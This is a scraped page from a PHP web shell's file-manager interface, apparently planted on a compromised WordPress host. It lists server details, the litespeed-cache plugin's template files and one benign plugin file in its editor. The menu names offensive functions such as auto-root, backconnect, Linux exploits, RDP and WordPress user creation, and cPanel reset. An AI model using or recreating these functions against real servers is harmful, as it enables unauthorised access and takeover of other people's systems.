Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.12.34.148
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
litespeed-cache /
tpl /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin_footer.php
1.54
KB
-rw-r--r--
api_key.php
294
B
-rw-r--r--
check_cache_disabled.php
1.55
KB
-rw-r--r--
check_if_network_disable_all.p...
623
B
-rw-r--r--
disabled_all.php
259
B
-rw-r--r--
in_upgrading.php
241
B
-rw-r--r--
metabox.php
1.07
KB
-rw-r--r--
modal.footer.php
9
B
-rw-r--r--
modal.header.php
502
B
-rw-r--r--
show_display_installed.php
1.34
KB
-rw-r--r--
show_error_cookie.php
682
B
-rw-r--r--
show_rule_conflict.php
687
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : show_rule_conflict.php
<?php namespace LiteSpeed; defined('WPINC') || exit(); $err = sprintf( __( 'Unexpected cache rule %2$s found in %1$s file. This rule may cause visitors to see old versions of pages due to the browser caching HTML pages. If you are sure that HTML pages are not being browser cached, this message can be dismissed. (<a %3$s>Learn More</a>)', 'litespeed-cache' ), '.htaccess', '`ExpiresDefault`', 'href="https://docs.litespeedtech.com/lscache/lscwp/troubleshoot/#browser-displays-stale-content" target="_blank"' ); // other plugin left cache expired rules in .htaccess which will cause conflicts echo self::build_notice(self::NOTICE_YELLOW . ' lscwp-notice-ruleconflict', $err);
Close